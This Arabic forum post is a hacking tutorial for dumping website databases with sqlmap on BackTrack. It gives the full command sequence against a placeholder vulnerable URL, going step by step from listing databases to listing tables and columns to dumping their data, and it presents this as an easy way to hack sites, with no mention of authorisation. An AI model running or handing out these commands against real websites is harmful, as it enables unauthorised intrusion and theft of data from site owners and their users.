(Hack websites using Backtrack (sqlmap شرح إختراق المواقع باستخدام الباك تراك (sqlmap) sqlmap هو أداة حقن SQL التلقائي التي تساعدك على الإختراق الموقع بسهولة تامة. اتبع الخطوات البسيطة اولاً: فتح ال sqlmap في ال backtrack هناك طريقتان 1 OR 2 نقوم بفتح التيرمنال ونكتب الامر التالي cd /pentest/database/sqlmap ثانياً: نقوم بوضع الموقع الذي توجد بة ثغرة sql python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 --dbs بعد تنفيذ الامر سوف تظهر لنا اسم قاعدة البيانات ثالثاً: لاستخراج اسماء الجداول الموجودة داخل قاعدة البيانات ننفذ الامر التالي python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 -D (database name) –tables بعد تنفيذ الامر نحصل على اسماء الجداول الموجودة داخل قاعدة البيانات رابعاً: استخراج الاعمدة الخاصة بجدول معين ننفذ الامر التالي python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 -D (database name) -T (Table name) --columns بعد تنفيذ الامر وكتابة اسم الجدول الذي نريد استخراج الاعمدة الخاصة بة ستظهر لنا اسماء الاعمدة ونوع البيانات خامساً: استخراج البيانات الموجودة داخل الاعمدة ننفذ الامر التالي python sqlmap.py -u http://www.example.com/newsDetail.php?id=8 -D (database name) -T (Table name) -C (column1_name,column2_name,....) --dump بعد تنفيذ الامر وكتابة اسماء الاعمدة التي نريد استخراج بياناتها ستظهر لنا او تابع الشرح التالي ارجو ان ينال اعجابكم وان تستفيدو من هذا الشرح وارجو ان يكون الشرح سهل وممتع
عرض سحابة الكلمة الدلالية
قوانين المنتدى
